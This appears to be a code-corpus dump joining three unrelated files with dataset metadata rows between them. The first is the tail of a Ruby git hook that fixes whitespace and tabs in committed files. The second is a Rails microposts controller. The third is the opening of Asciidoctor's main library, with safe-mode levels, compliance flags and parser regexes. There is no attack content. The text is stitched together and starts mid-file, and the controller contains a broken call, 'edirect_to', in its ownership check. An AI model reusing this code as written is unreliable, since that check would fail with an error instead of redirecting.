date
dbm
etc
fcntl
fiddle
gdbm
io/console
json
openssl
psych
racc
sdbm
stringio
strscan
zlib
]
IGNORED_FILES = [
# default gems whose master is GitHub
%r{\Abin/(?!erb)\w+\z},
*(DEFAULT_GEM_LIBS + DEFAULT_GEM_EXTS).flat_map { |lib|
[
%r{\Alib/#{lib}/},
%r{\Alib/#{lib}\.gemspec\z},
%r{\Alib/#{lib}\.rb\z},
%r{\Atest/#{lib}/},
]
},
*DEFAULT_GEM_EXTS.flat_map { |ext|
[
%r{\Aext/#{ext}/},
%r{\Atest/#{ext}/},
]
},
# vendoring (ccan)
%r{\Accan/},
# vendoring (onigmo)
%r{\Aenc/},
%r{\Ainclude/ruby/onigmo\.h\z},
%r{\Areg.+\.(c|h)\z},
# explicit or implicit `c-file-style: "linux"`
%r{\Aaddr2line\.c\z},
%r{\Amissing/},
%r{\Astrftime\.c\z},
%r{\Avsnprintf\.c\z},
# to respect the original statements of licenses
%r{\ALEGAL\z},
]
repo_path, *rest = ARGV
rest.each_slice(3).map do |oldrev, newrev, refname|
branch = IO.popen({ 'GIT_DIR' => repo_path }, ['git', 'rev-parse', '--symbolic', '--abbrev-ref', refname], &:read).strip
next if branch != 'master' # Stable branches are on svn, and for consistency we should not make a git-specific commit.
vcs = Git.new(oldrev, newrev, branch)
Dir.mktmpdir do |workdir|
depth = vcs.depth + 1
system "git clone --depth=#{depth} --branch=#{branch} file:///#{repo_path} #{workdir}"
Dir.chdir(workdir)
paths = vcs.updated_paths
paths.select! {|l|
/^\d/ !~ l and /\.bat\z/ !~ l and
(/\A(?:config|[Mm]akefile|GNUmakefile|README)/ =~ File.basename(l) or
/\A\z|\.(?:[chsy]|\d+|e?rb|tmpl|bas[eh]|z?sh|in|ma?k|def|src|trans|rdoc|ja|en|el|sed|awk|p[ly]|scm|mspec|html|)\z/ =~ File.extname(l))
}
files = paths.select {|n| File.file?(n) }
files.reject! do |f|
IGNORED_FILES.any? { |re| f.match(re) }
end
next if files.empty?
trailing = eofnewline = expandtab = false
edited_files = files.select do |f|
src = File.binread(f) rescue next
eofnewline = eofnewline0 = true if src.sub!(/(?<!\n)\z/, "\n")
trailing0 = false
expandtab0 = false
updated_lines = vcs.updated_lines(f)
if !updated_lines.empty?
src.gsub!(/^.*$/).with_index do |line, lineno|
if updated_lines.include?(lineno)
trailing = trailing0 = true if line.sub!(/[ \t]+$/, '')
end
line
end
end
if !updated_lines.empty? && (f.end_with?('.c') || f.end_with?('.h') || f == 'insns.def')
# If and only if unedited lines did not have tab indentation, prevent introducing tab indentation to the file.
expandtab_allowed = src.each_line.with_index.all? do |line, lineno|
updated_lines.include?(lineno) || !line.start_with?("\t")
end
if expandtab_allowed
src.gsub!(/^.*$/).with_index do |line, lineno|
if updated_lines.include?(lineno) && line.start_with?("\t") # last-committed line with hard tabs
expandtab = expandtab0 = true
line.sub(/\A\t+/) { |tabs| ' ' * (8 * tabs.length) }
else
line
end
end
end
end
if trailing0 or eofnewline0 or expandtab0
File.binwrite(f, src)
true
end
end
unless edited_files.empty?
msg = [('remove trailing spaces' if trailing),
('append newline at EOF' if eofnewline),
('expand tabs' if expandtab),
].compact
message = "* #{msg.join(', ')}. [ci skip]"
if expandtab
message += "\n\nTabs were expanded because the file did not have any tab indentation in unedited lines."
message += "\nPlease update your editor config, and use misc/expand_tabs.rb in the pre-commit hook."
end
vcs.commit(message, *edited_files)
end
end
end
| 24.543478 | 141 | 0.573605 |
6a1748c2771ecd7c64fcbbe451647ada7f61a6c3 | 779 | class MicropostsController < ApplicationController
before_action :logged_in_user, only: [:create, :destroy]
before_action :correct_user, only: :destroy
def create
@micropost = current_user.microposts.build(micropost_params)
if @micropost.save
flash[:success] = "Micropost created!"
redirect_to root_url
else
@feed_items = []
render 'static_pages/home'
end
end
def destroy
@micropost.destroy
flash[:success] = "Micropost deleted"
redirect_to request.referrer || root_url
end
private
def micropost_params
params.require(:micropost).permit(:content, :picture)
end
def correct_user
@micropost = current_user.microposts.find_by(id: params[:id])
edirect_to root_url if @micropost.nil?
end
end | 24.34375 | 65 | 0.711168 |
1a6398de69158f8c130f3f482f66cb635e7c9386 | 53,519 | # encoding: UTF-8
RUBY_ENGINE = 'unknown' unless defined? RUBY_ENGINE
RUBY_ENGINE_OPAL = (RUBY_ENGINE == 'opal')
RUBY_ENGINE_JRUBY = (RUBY_ENGINE == 'jruby')
RUBY_MIN_VERSION_1_9 = (RUBY_VERSION >= '1.9')
RUBY_MIN_VERSION_2 = (RUBY_VERSION >= '2')
require 'set'
# NOTE RUBY_ENGINE == 'opal' conditional blocks are filtered by the Opal preprocessor
if RUBY_ENGINE == 'opal'
# NOTE asciidoctor/opal_ext is supplied by the Asciidoctor.js build
require 'asciidoctor/opal_ext'
else
autoload :Base64, 'base64'
autoload :FileUtils, 'fileutils'
autoload :OpenURI, 'open-uri'
autoload :StringScanner, 'strscan'
end
# ideally we should use require_relative instead of modifying the LOAD_PATH
$:.unshift File.dirname __FILE__
# Public: Methods for parsing AsciiDoc input files and converting documents
# using eRuby templates.
#
# AsciiDoc documents comprise a header followed by zero or more sections.
# Sections are composed of blocks of content. For example:
#
# = Doc Title
#
# == Section 1
#
# This is a paragraph block in the first section.
#
# == Section 2
#
# This section has a paragraph block and an olist block.
#
# . Item 1
# . Item 2
#
# Examples:
#
# Use built-in converter:
#
# Asciidoctor.convert_file 'sample.adoc'
#
# Use custom (Tilt-supported) templates:
#
# Asciidoctor.convert_file 'sample.adoc', :template_dir => 'path/to/templates'
#
module Asciidoctor
# alias the RUBY_ENGINE constant inside the Asciidoctor namespace
RUBY_ENGINE = ::RUBY_ENGINE
module SafeMode
# A safe mode level that disables any of the security features enforced
# by Asciidoctor (Ruby is still subject to its own restrictions).
UNSAFE = 0;
# A safe mode level that closely parallels safe mode in AsciiDoc. This value
# prevents access to files which reside outside of the parent directory of
# the source file and disables any macro other than the include::[] macro.
SAFE = 1;
# A safe mode level that disallows the document from setting attributes
# that would affect the conversion of the document, in addition to all the
# security features of SafeMode::SAFE. For instance, this level disallows
# changing the backend or the source-highlighter using an attribute defined
# in the source document. This is the most fundamental level of security
# for server-side deployments (hence the name).
SERVER = 10;
# A safe mode level that disallows the document from attempting to read
# files from the file system and including the contents of them into the
# document, in additional to all the security features of SafeMode::SERVER.
# For instance, this level disallows use of the include::[] macro and the
# embedding of binary content (data uri), stylesheets and JavaScripts
# referenced by the document.(Asciidoctor and trusted extensions may still
# be allowed to embed trusted content into the document).
#
# Since Asciidoctor is aiming for wide adoption, this level is the default
# and is recommended for server-side deployments.
SECURE = 20;
# A planned safe mode level that disallows the use of passthrough macros and
# prevents the document from setting any known attributes, in addition to all
# the security features of SafeMode::SECURE.
#
# Please note that this level is not currently implemented (and therefore not
# enforced)!
#PARANOID = 100;
end
# Flags to control compliance with the behavior of AsciiDoc
module Compliance
@keys = ::Set.new
class << self
attr :keys
end
# Defines a new compliance key and assigns an initial value.
def self.define key, value
instance_variable_set %(@#{key}), value
class << self; self; end.send :attr_accessor, key
@keys << key
nil
end
# AsciiDoc terminates paragraphs adjacent to
# block content (delimiter or block attribute list)
# This option allows this behavior to be modified
# TODO what about literal paragraph?
# Compliance value: true
define :block_terminates_paragraph, true
# AsciiDoc does not treat paragraphs labeled with a verbatim style
# (literal, listing, source, verse) as verbatim
# This options allows this behavior to be modified
# Compliance value: false
define :strict_verbatim_paragraphs, true
# NOT CURRENTLY USED
# AsciiDoc allows start and end delimiters around
# a block to be different lengths
# Enabling this option requires matching lengths
# Compliance value: false
#define :congruent_block_delimiters, true
# AsciiDoc supports both single-line and underlined
# section titles.
# This option disables the underlined variant.
# Compliance value: true
define :underline_style_section_titles, true
# Asciidoctor will unwrap the content in a preamble
# if the document has a title and no sections.
# Compliance value: false
define :unwrap_standalone_preamble, true
# AsciiDoc drops lines that contain references to missing attributes.
# This behavior is not intuitive to most writers
# Compliance value: 'drop-line'
define :attribute_missing, 'skip'
# AsciiDoc drops lines that contain an attribute unassignemnt.
# This behavior may need to be tuned depending on the circumstances.
# Compliance value: 'drop-line'
define :attribute_undefined, 'drop-line'
# Asciidoctor will allow the id, role and options to be set
# on blocks using a shorthand syntax (e.g., #idname.rolename%optionname)
# Compliance value: false
define :shorthand_property_syntax, true
# Asciidoctor will start counting at the following number
# when creating a unique id when there is a conflict
# Compliance value: 2
define :unique_id_start_index, 2
# Asciidoctor will recognize commonly-used Markdown syntax
# to the degree it does not interfere with existing
# AsciiDoc syntax and behavior.
# Compliance value: false
define :markdown_syntax, true
end
# The absolute root path of the Asciidoctor RubyGem
ROOT_PATH = ::File.dirname ::File.dirname ::File.expand_path __FILE__
# The absolute lib path of the Asciidoctor RubyGem
LIB_PATH = ::File.join ROOT_PATH, 'lib'
# The absolute data path of the Asciidoctor RubyGem
DATA_PATH = ::File.join ROOT_PATH, 'data'
# The user's home directory, as best we can determine it
# NOTE not using infix rescue for performance reasons, see: https://github.com/jruby/jruby/issues/1816
begin
USER_HOME = ::Dir.home
rescue
USER_HOME = ::ENV['HOME'] || ::Dir.pwd
end
# Flag to indicate whether encoding can be coerced to UTF-8
# _All_ input data must be force encoded to UTF-8 if Encoding.default_external is *not* UTF-8
# Addresses failures performing string operations that are reported as "invalid byte sequence in US-ASCII"
# Ruby 1.8 doesn't seem to experience this problem (perhaps because it isn't validating the encodings)
COERCE_ENCODING = !::RUBY_ENGINE_OPAL && ::RUBY_MIN_VERSION_1_9
# Flag to indicate whether encoding of external strings needs to be forced to UTF-8
FORCE_ENCODING = COERCE_ENCODING && ::Encoding.default_external != ::Encoding::UTF_8
# Byte arrays for UTF-* Byte Order Marks
# hex escape sequence used for Ruby 1.8 compatibility
BOM_BYTES_UTF_8 = "\xef\xbb\xbf".bytes.to_a
BOM_BYTES_UTF_16LE = "\xff\xfe".bytes.to_a
BOM_BYTES_UTF_16BE = "\xfe\xff".bytes.to_a
# Flag to indicate that line length should be calculated using a unicode mode hint
FORCE_UNICODE_LINE_LENGTH = !::RUBY_MIN_VERSION_1_9
# Flag to indicate whether gsub can use a Hash to map matches to replacements
SUPPORTS_GSUB_RESULT_HASH = ::RUBY_MIN_VERSION_1_9 && !::RUBY_ENGINE_OPAL
# The endline character used for output; stored in constant table as an optimization
EOL = "\n"
# The null character to use for splitting attribute values
NULL = "\0"
# String for matching tab character
TAB = "\t"
# The default document type
# Can influence markup generated by the converters
DEFAULT_DOCTYPE = 'article'
# The backend determines the format of the converted output, default to html5
DEFAULT_BACKEND = 'html5'
DEFAULT_STYLESHEET_KEYS = ['', 'DEFAULT'].to_set
DEFAULT_STYLESHEET_NAME = 'asciidoctor.css'
# Pointers to the preferred version for a given backend.
BACKEND_ALIASES = {
'html' => 'html5',
'docbook' => 'docbook5'
}
# Default page widths for calculating absolute widths
DEFAULT_PAGE_WIDTHS = {
'docbook' => 425
}
# Default extensions for the respective base backends
DEFAULT_EXTENSIONS = {
'html' => '.html',
'docbook' => '.xml',
'pdf' => '.pdf',
'epub' => '.epub',
'asciidoc' => '.adoc'
}
# Set of file extensions recognized as AsciiDoc documents (stored as a truth hash)
ASCIIDOC_EXTENSIONS = {
'.asciidoc' => true,
'.adoc' => true,
'.ad' => true,
'.asc' => true,
# TODO .txt should be deprecated
'.txt' => true
}
SECTION_LEVELS = {
'=' => 0,
'-' => 1,
'~' => 2,
'^' => 3,
'+' => 4
}
ADMONITION_STYLES = ['NOTE', 'TIP', 'IMPORTANT', 'WARNING', 'CAUTION'].to_set
PARAGRAPH_STYLES = ['comment', 'example', 'literal', 'listing', 'normal', 'pass', 'quote', 'sidebar', 'source', 'verse', 'abstract', 'partintro'].to_set
VERBATIM_STYLES = ['literal', 'listing', 'source', 'verse'].to_set
DELIMITED_BLOCKS = {
'--' => [:open, ['comment', 'example', 'literal', 'listing', 'pass', 'quote', 'sidebar', 'source', 'verse', 'admonition', 'abstract', 'partintro'].to_set],
'----' => [:listing, ['literal', 'source'].to_set],
'....' => [:literal, ['listing', 'source'].to_set],
'====' => [:example, ['admonition'].to_set],
'****' => [:sidebar, ::Set.new],
'____' => [:quote, ['verse'].to_set],
'""' => [:quote, ['verse'].to_set],
'++++' => [:pass, ['stem', 'latexmath', 'asciimath'].to_set],
'|===' => [:table, ::Set.new],
',===' => [:table, ::Set.new],
':===' => [:table, ::Set.new],
'!===' => [:table, ::Set.new],
'////' => [:comment, ::Set.new],
'```' => [:fenced_code, ::Set.new]
}
DELIMITED_BLOCK_LEADERS = DELIMITED_BLOCKS.keys.map {|key| key[0..1] }.to_set
LAYOUT_BREAK_LINES = {
'\'' => :thematic_break,
'-' => :thematic_break,
'*' => :thematic_break,
'_' => :thematic_break,
'<' => :page_break
}
#LIST_CONTEXTS = [:ulist, :olist, :dlist, :colist]
NESTABLE_LIST_CONTEXTS = [:ulist, :olist, :dlist]
# TODO validate use of explicit style name above ordered list (this list is for selecting an implicit style)
ORDERED_LIST_STYLES = [:arabic, :loweralpha, :lowerroman, :upperalpha, :upperroman] #, :lowergreek]
ORDERED_LIST_KEYWORDS = {
'loweralpha' => 'a',
'lowerroman' => 'i',
'upperalpha' => 'A',
'upperroman' => 'I'
#'lowergreek' => 'a'
#'arabic' => '1'
#'decimal' => '1'
}
LIST_CONTINUATION = '+'
# NOTE AsciiDoc Python recognizes both a preceding TAB and a space
LINE_BREAK = ' +'
LINE_CONTINUATION = ' \\'
LINE_CONTINUATION_LEGACY = ' +'
BLOCK_MATH_DELIMITERS = {
:asciimath => ['\\$', '\\$'],
:latexmath => ['\\[', '\\]'],
}
INLINE_MATH_DELIMITERS = {
:asciimath => ['\\$', '\\$'],
:latexmath => ['\\(', '\\)'],
}
# attributes which be changed within the content of the document (but not
# header) because it has semantic meaning; ex. sectnums
FLEXIBLE_ATTRIBUTES = %w(sectnums)
# A collection of regular expressions used by the parser.
#
# NOTE: The following pattern, which appears frequently, captures the
# contents between square brackets, ignoring escaped closing brackets
# (closing brackets prefixed with a backslash '\' character)
#
# Pattern: (?:\[((?:\\\]|[^\]])*?)\])
# Matches: [enclosed text here] or [enclosed [text\] here]
#
#(pseudo)module Rx
## Regular expression character classes (to ensure regexp compatibility between Ruby and JavaScript)
## CC stands for "character class", CG stands for "character class group"
# NOTE \w matches only the ASCII word characters, whereas [[:word:]] or \p{Word} matches any character in the Unicode word category.
# character classes for the Regexp engine(s) in JavaScript
if RUBY_ENGINE == 'opal'
CC_ALPHA = 'a-zA-Z'
CG_ALPHA = '[a-zA-Z]'
CC_ALNUM = 'a-zA-Z0-9'
CG_ALNUM = '[a-zA-Z0-9]'
CG_BLANK = '[ \\t]'
CC_EOL = '(?=\\n|$)'
CG_GRAPH = '[\\x21-\\x7E]' # non-blank character
CC_ALL = '[\s\S]' # any character, including newlines (alternatively, [^])
CC_WORD = 'a-zA-Z0-9_'
CG_WORD = '[a-zA-Z0-9_]'
# character classes for the Regexp engine in Ruby >= 2 (Ruby 1.9 supports \p{} but has problems w/ encoding)
elsif ::RUBY_MIN_VERSION_2
CC_ALPHA = CG_ALPHA = '\p{Alpha}'
CC_ALNUM = CG_ALNUM = '\p{Alnum}'
CC_ALL = '.'
CG_BLANK = '\p{Blank}'
CC_EOL = '$'
CG_GRAPH = '\p{Graph}'
CC_WORD = CG_WORD = '\p{Word}'
# character classes for the Regexp engine in Ruby < 2
else
CC_ALPHA = '[:alpha:]'
CG_ALPHA = '[[:alpha:]]'
CC_ALL = '.'
CC_ALNUM = '[:alnum:]'
CG_ALNUM = '[[:alnum:]]'
CG_BLANK = '[[:blank:]]'
CC_EOL = '$'
CG_GRAPH = '[[:graph:]]' # non-blank character
if ::RUBY_MIN_VERSION_1_9
CC_WORD = '[:word:]'
CG_WORD = '[[:word:]]'
else
# NOTE Ruby 1.8 cannot match word characters beyond the ASCII range; if you need this feature, upgrade!
CC_WORD = '[:alnum:]_'
CG_WORD = '[[:alnum:]_]'
end
end
## Document header
# Matches the author info line immediately following the document title.
#
# Examples
#
# Doc Writer <[email protected]>
# Mary_Sue Brontë
#
AuthorInfoLineRx = /^(#{CG_WORD}[#{CC_WORD}\-'.]*)(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +(#{CG_WORD}[#{CC_WORD}\-'.]*))?(?: +<([^>]+)>)?$/
# Matches the revision info line, which appears immediately following
# the author info line beneath the document title.
#
# Examples
#
# v1.0
# 2013-01-01
# v1.0, 2013-01-01: Ring in the new year release
# 1.0, Jan 01, 2013
#
RevisionInfoLineRx = /^(?:\D*(.*?),)?(?:\s*(?!:)(.*?))(?:\s*(?!^):\s*(.*))?$/
# Matches the title and volnum in the manpage doctype.
#
# Examples
#
# = asciidoctor ( 1 )
#
ManpageTitleVolnumRx = /^(.*)\((.*)\)$/
# Matches the name and purpose in the manpage doctype.
#
# Examples
#
# asciidoctor - converts AsciiDoc source files to HTML, DocBook and other formats
#
ManpageNamePurposeRx = /^(.*?)#{CG_BLANK}+-#{CG_BLANK}+(.*)$/
## Preprocessor directives
# Matches a conditional preprocessor directive (e.g., ifdef, ifndef, ifeval and endif).
#
# Examples
#
# ifdef::basebackend-html[]
# ifndef::theme[]
# ifeval::["{asciidoctor-version}" >= "0.1.0"]
# ifdef::asciidoctor[Asciidoctor!]
# endif::theme[]
# endif::basebackend-html[]
# endif::[]
#
ConditionalDirectiveRx = /^\\?(ifdef|ifndef|ifeval|endif)::(\S*?(?:([,\+])\S+?)?)\[(.+)?\]$/
# Matches a restricted (read as safe) eval expression.
#
# Examples
#
# "{asciidoctor-version}" >= "0.1.0"
#
EvalExpressionRx = /^(\S.*?)#{CG_BLANK}*(==|!=|<=|>=|<|>)#{CG_BLANK}*(\S.*)$/
# Matches an include preprocessor directive.
#
# Examples
#
# include::chapter1.ad[]
# include::example.txt[lines=1;2;5..10]
#
IncludeDirectiveRx = /^\\?include::([^\[]+)\[(.*?)\]$/
# Matches a trailing tag directive in an include file.
#
# Examples
#
# // tag::try-catch[]
# try {
# someMethod();
# catch (Exception e) {
# log(e);
# }
# // end::try-catch[]
TagDirectiveRx = /\b(?:tag|end)::\S+\[\]$/
## Attribute entries and references
# Matches a document attribute entry.
#
# Examples
#
# :foo: bar
# :First Name: Dan
# :sectnums!:
# :!toc:
# :long-entry: Attribute value lines ending in ' +'
# are joined together as a single value,
# collapsing the line breaks and indentation to
# a single space.
#
AttributeEntryRx = /^:(!?\w.*?):(?:#{CG_BLANK}+(.*))?$/
# Matches invalid characters in an attribute name.
InvalidAttributeNameCharsRx = /[^\w\-]/
# Matches the pass inline macro allowed in value of attribute assignment.
#
# Examples
#
# pass:[text]
#
AttributeEntryPassMacroRx = /^pass:([a-z,]*)\[(.*)\]$/
# Matches an inline attribute reference.
#
# Examples
#
# {foo}
# {counter:pcount:1}
# {set:foo:bar}
# {set:name!}
#
AttributeReferenceRx = /(\\)?\{((set|counter2?):.+?|\w+(?:[\-]\w+)*)(\\)?\}/
## Paragraphs and delimited blocks
# Matches an anchor (i.e., id + optional reference text) on a line above a block.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
#
BlockAnchorRx = /^\[\[(?:|([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*))?)\]\]$/
# Matches an attribute list above a block element.
#
# Examples
#
# # strictly positional
# [quote, Adam Smith, Wealth of Nations]
#
# # name/value pairs
# [NOTE, caption="Good to know"]
#
# # as attribute reference
# [{lead}]
#
BlockAttributeListRx = /^\[(|#{CG_BLANK}*[#{CC_WORD}\{,.#"'%].*)\]$/
# A combined pattern that matches either a block anchor or a block attribute list.
#
# TODO this one gets hit a lot, should be optimized as much as possible
BlockAttributeLineRx = /^\[(|#{CG_BLANK}*[#{CC_WORD}\{,.#"'%].*|\[(?:|[#{CC_ALPHA}:_][#{CC_WORD}:.-]*(?:,#{CG_BLANK}*\S.*)?)\])\]$/
# Matches a title above a block.
#
# Examples
#
# .Title goes here
#
BlockTitleRx = /^\.([^\s.].*)$/
# Matches an admonition label at the start of a paragraph.
#
# Examples
#
# NOTE: Just a little note.
# TIP: Don't forget!
#
AdmonitionParagraphRx = /^(#{ADMONITION_STYLES.to_a * '|'}):#{CG_BLANK}/
# Matches a literal paragraph, which is a line of text preceded by at least one space.
#
# Examples
#
# <SPACE>Foo
# <TAB>Foo
LiteralParagraphRx = /^(#{CG_BLANK}+.*)$/
# Matches a comment block.
#
# Examples
#
# ////
# This is a block comment.
# It can span one or more lines.
# ////
CommentBlockRx = %r{^/{4,}$}
# Matches a comment line.
#
# Examples
#
# // an then whatever
#
CommentLineRx = %r{^//(?:[^/]|$)}
## Section titles
# Matches a single-line (Atx-style) section title.
#
# Examples
#
# == Foo
# # ^ a level 1 (h2) section title
#
# == Foo ==
# # ^ also a level 1 (h2) section title
#
# match[1] is the delimiter, whose length determines the level
# match[2] is the title itself
# match[3] is an inline anchor, which becomes the section id
AtxSectionRx = /^((?:=|#){1,6})#{CG_BLANK}+(\S.*?)(?:#{CG_BLANK}+\1)?$/
# Matches the restricted section name for a two-line (Setext-style) section title.
# The name cannot begin with a dot and has at least one alphanumeric character.
SetextSectionTitleRx = /^((?=.*#{CG_WORD}+.*)[^.].*?)$/
# Matches the underline in a two-line (Setext-style) section title.
#
# Examples
#
# ====== || ------ || ~~~~~~ || ^^^^^^ || ++++++
#
SetextSectionLineRx = /^(?:=|-|~|\^|\+)+$/
# Matches an anchor (i.e., id + optional reference text) inside a section title.
#
# Examples
#
# Section Title [[idname]]
# Section Title [[idname,Reference Text]]
#
InlineSectionAnchorRx = /^(.*?)#{CG_BLANK}+(\\)?\[\[([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*?))?\]\]$/
# Matches invalid characters in a section id.
InvalidSectionIdCharsRx = /&(?:[a-zA-Z]{2,}|#\d{2,5}|#x[a-fA-F0-9]{2,4});|[^#{CC_WORD}]+?/
# Matches the block style used to designate a section title as a floating title.
#
# Examples
#
# [float]
# = Floating Title
#
FloatingTitleStyleRx = /^(?:float|discrete)\b/
## Lists
# Detects the start of any list item.
AnyListRx = /^(?:<?\d+>#{CG_BLANK}+#{CG_GRAPH}|#{CG_BLANK}*(?:-|(?:\*|\.|\u2022){1,5}|\d+\.|[a-zA-Z]\.|[IVXivx]+\))#{CG_BLANK}+#{CG_GRAPH}|#{CG_BLANK}*.*?(?::{2,4}|;;)(?:#{CG_BLANK}+#{CG_GRAPH}|$))/
# Matches an unordered list item (one level for hyphens, up to 5 levels for asterisks).
#
# Examples
#
# * Foo
# - Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
UnorderedListRx = /^#{CG_BLANK}*(-|\*{1,5}|\u2022{1,5})#{CG_BLANK}+(.*)$/
# Matches an ordered list item (explicit numbering or up to 5 consecutive dots).
#
# Examples
#
# . Foo
# .. Foo
# 1. Foo (arabic, default)
# a. Foo (loweralpha)
# A. Foo (upperalpha)
# i. Foo (lowerroman)
# I. Foo (upperroman)
#
# NOTE leading space match is not always necessary, but is used for list reader
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
OrderedListRx = /^#{CG_BLANK}*(\.{1,5}|\d+\.|[a-zA-Z]\.|[IVXivx]+\))#{CG_BLANK}+(.*)$/
# Matches the ordinals for each type of ordered list.
OrderedListMarkerRxMap = {
:arabic => /\d+[.>]/,
:loweralpha => /[a-z]\./,
:lowerroman => /[ivx]+\)/,
:upperalpha => /[A-Z]\./,
:upperroman => /[IVX]+\)/
#:lowergreek => /[a-z]\]/
}
# Matches a definition list item.
#
# Examples
#
# foo::
# foo:::
# foo::::
# foo;;
#
# # should be followed by a definition, on the same line...
#
# foo:: That which precedes 'bar' (see also, <<bar>>)
#
# # ...or on a separate line
#
# foo::
# That which precedes 'bar' (see also, <<bar>>)
#
# # the term may be an attribute reference
#
# {foo_term}:: {foo_def}
#
# NOTE negative match for comment line is intentional since that isn't handled when looking for next list item
# QUESTION should we check for line comment in regex or when scanning the lines?
#
DefinitionListRx = /^(?!\/\/)#{CG_BLANK}*(.*?)(:{2,4}|;;)(?:#{CG_BLANK}+(.*))?$/
# Matches a sibling definition list item (which does not include the keyed type).
DefinitionListSiblingRx = {
# (?:.*?[^:])? - a non-capturing group which grabs longest sequence of characters that doesn't end w/ colon
'::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(::)(?:#{CG_BLANK}+(.*))?$/,
':::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(:::)(?:#{CG_BLANK}+(.*))?$/,
'::::' => /^(?!\/\/)#{CG_BLANK}*((?:.*[^:])?)(::::)(?:#{CG_BLANK}+(.*))?$/,
';;' => /^(?!\/\/)#{CG_BLANK}*(.*)(;;)(?:#{CG_BLANK}+(.*))?$/
}
# Matches a callout list item.
#
# Examples
#
# <1> Foo
#
# NOTE we know trailing (.*) will match at least one character because we strip trailing spaces
CalloutListRx = /^<?(\d+)>#{CG_BLANK}+(.*)/
# Matches a callout reference inside literal text.
#
# Examples
# <1> (optionally prefixed by //, #, -- or ;; line comment chars)
# <1> <2> (multiple callouts on one line)
# <!--1--> (for XML-based languages)
#
# NOTE extract regexps are applied line-by-line, so we can use $ as end-of-line char
CalloutExtractRx = /(?:(?:\/\/|#|--|;;) ?)?(\\)?<!?(--|)(\d+)\2>(?=(?: ?\\?<!?\2\d+\2>)*$)/
CalloutExtractRxt = '(\\\\)?<()(\\d+)>(?=(?: ?\\\\?<\\d+>)*$)'
# NOTE special characters have not been replaced when scanning
CalloutQuickScanRx = /\\?<!?(--|)(\d+)\1>(?=(?: ?\\?<!?\1\d+\1>)*#{CC_EOL})/
# NOTE special characters have already been replaced when converting to an SGML format
CalloutSourceRx = /(?:(?:\/\/|#|--|;;) ?)?(\\)?<!?(--|)(\d+)\2>(?=(?: ?\\?<!?\2\d+\2>)*#{CC_EOL})/
CalloutSourceRxt = "(\\\\)?<()(\\d+)>(?=(?: ?\\\\?<\\d+>)*#{CC_EOL})"
# A Hash of regexps for lists used for dynamic access.
ListRxMap = {
:ulist => UnorderedListRx,
:olist => OrderedListRx,
:dlist => DefinitionListRx,
:colist => CalloutListRx
}
## Tables
# Parses the column spec (i.e., colspec) for a table.
#
# Examples
#
# 1*h,2*,^3e
#
ColumnSpecRx = /^(?:(\d+)\*)?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?(\d+%?)?([a-z])?$/
# Parses the start and end of a cell spec (i.e., cellspec) for a table.
#
# Examples
#
# 2.3+<.>m
#
# FIXME use step-wise scan (or treetop) rather than this mega-regexp
CellSpecStartRx = /^#{CG_BLANK}*(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
CellSpecEndRx = /#{CG_BLANK}+(?:(\d+(?:\.\d*)?|(?:\d*\.)?\d+)([*+]))?([<^>](?:\.[<^>]?)?|(?:[<^>]?\.)?[<^>])?([a-z])?$/
# Block macros
# Matches the general block macro pattern.
#
# Examples
#
# gist::123456[]
#
#--
# NOTE we've relaxed the match for target to accomodate the short format (e.g., name::[attrlist])
GenericBlockMacroRx = /^(#{CG_WORD}+)::(\S*?)\[((?:\\\]|[^\]])*?)\]$/
# Matches an image, video or audio block macro.
#
# Examples
#
# image::filename.png[Caption]
# video::http://youtube.com/12345[Cats vs Dogs]
#
MediaBlockMacroRx = /^(image|video|audio)::(\S+?)\[((?:\\\]|[^\]])*?)\]$/
# Matches the TOC block macro.
#
# Examples
#
# toc::[]
# toc::[levels=2]
#
TocBlockMacroRx = /^toc::\[(.*?)\]$/
## Inline macros
# Matches an anchor (i.e., id + optional reference text) in the flow of text.
#
# Examples
#
# [[idname]]
# [[idname,Reference Text]]
# anchor:idname[]
# anchor:idname[Reference Text]
#
InlineAnchorRx = /\\?(?:\[\[([#{CC_ALPHA}:_][#{CC_WORD}:.-]*)(?:,#{CG_BLANK}*(\S.*?))?\]\]|anchor:(\S+)\[(.*?[^\\])?\])/
# Matches a bibliography anchor anywhere inline.
#
# Examples
#
# [[[Foo]]]
#
InlineBiblioAnchorRx = /\\?\[\[\[([#{CC_WORD}:][#{CC_WORD}:.-]*?)\]\]\]/
# Matches an inline e-mail address.
#
# [email protected]
#
EmailInlineMacroRx = /([\\>:\/])?#{CG_WORD}[#{CC_WORD}.%+-]*@#{CG_ALNUM}[#{CC_ALNUM}.-]*\.#{CG_ALPHA}{2,4}\b/
# Matches an inline footnote macro, which is allowed to span multiple lines.
#
# Examples
# footnote:[text]
# footnoteref:[id,text]
# footnoteref:[id]
#
FootnoteInlineMacroRx = /\\?(footnote(?:ref)?):\[(#{CC_ALL}*?[^\\])\]/m
# Matches an image or icon inline macro.
#
# Examples
#
# image:filename.png[Alt Text]
# image:http://example.com/images/filename.png[Alt Text]
# image:filename.png[More [Alt\] Text] (alt text becomes "More [Alt] Text")
# icon:github[large]
#
ImageInlineMacroRx = /\\?(?:image|icon):([^:\[][^\[]*)\[((?:\\\]|[^\]])*?)\]/
# Matches an indexterm inline macro, which may span multiple lines.
#
# Examples
#
# indexterm:[Tigers,Big cats]
# (((Tigers,Big cats)))
# indexterm2:[Tigers]
# ((Tigers))
#
IndextermInlineMacroRx = /\\?(?:(indexterm2?):\[(#{CC_ALL}*?[^\\])\]|\(\((#{CC_ALL}+?)\)\)(?!\)))/m
# Matches either the kbd or btn inline macro.
#
# Examples
#
# kbd:[F3]
# kbd:[Ctrl+Shift+T]
# kbd:[Ctrl+\]]
# kbd:[Ctrl,T]
# btn:[Save]
#
KbdBtnInlineMacroRx = /\\?(?:kbd|btn):\[((?:\\\]|[^\]])+?)\]/
# Matches the delimiter used for kbd value.
#
# Examples
#
# Ctrl + Alt+T
# Ctrl,T
#
